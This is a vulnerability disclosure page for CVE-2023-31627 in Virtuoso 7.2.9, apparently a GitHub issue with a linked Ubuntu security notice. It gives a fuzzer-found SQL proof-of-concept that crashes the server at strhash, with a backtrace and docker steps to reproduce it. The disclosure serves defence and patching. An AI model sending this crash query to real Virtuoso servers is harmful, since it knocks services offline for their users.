Headline
CVE-2023-31627: virtuoso 7.2.9 crashed at strhash · Issue #1140 · openlink/virtuoso-opensource
An issue in the strhash component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE t1 ( a varchar(255) DEFAULT NULL ); SELECT * FROM t1 WHERE CONTAINS(*, 'tutorial & (mysql & -VÐƷWİ)');
backtrace:
#0 0xdece40 (strhash+0x20) #1 0xdec783 (id_hash_get+0x33) #2 0x59c5d1 (tb_name_to_column+0x41) #3 0x76aed1 (ot_is_defd+0x211) #4 0x76b422 (sco_is_defd+0x372) #5 0x775cec (sqlo_implied_columns_of_contains+0x3fc) #6 0x77c3dc (sqlo_select_scope+0x75c) #7 0x76d347 (sqlo_scope+0x447) #8 0x70bd81 (sqlo_top_2+0x41) #9 0x70b9d5 (sqlo_top_1+0x135) #10 0x70d4c6 (sqlo_top_select+0x156) #11 0x6b72bf (sql_stmt_comp+0x8bf) #12 0x6ba122 (sql_compile_1+0x1a62) #13 0x7c8cd0 (stmt_set_query+0x340) #14 0x7cabc2 (sf_sql_execute+0x922) #15 0x7cbf4e (sf_sql_execute_w+0x17e) #16 0x7d4c0d (sf_sql_execute_wrapper+0x3d) #17 0xe1f01c (future_wrapper+0x3fc) #18 0xe2691e (_thread_boot+0x11e) #19 0x7ff1272a6609 (start_thread+0xd9) #20 0x7ff127076133 (clone+0x43)
ways to reproduce (write poc to the file ‘/tmp/test.sql’ first):
remove the old one
docker container rm virtdb_test -f
start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
wait the server starting
sleep 10
check whether the simple query works
echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba
run the poc
docker exec -i virtdb_test isql 1111 dba < “/tmp/test.sql”
Related news
Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.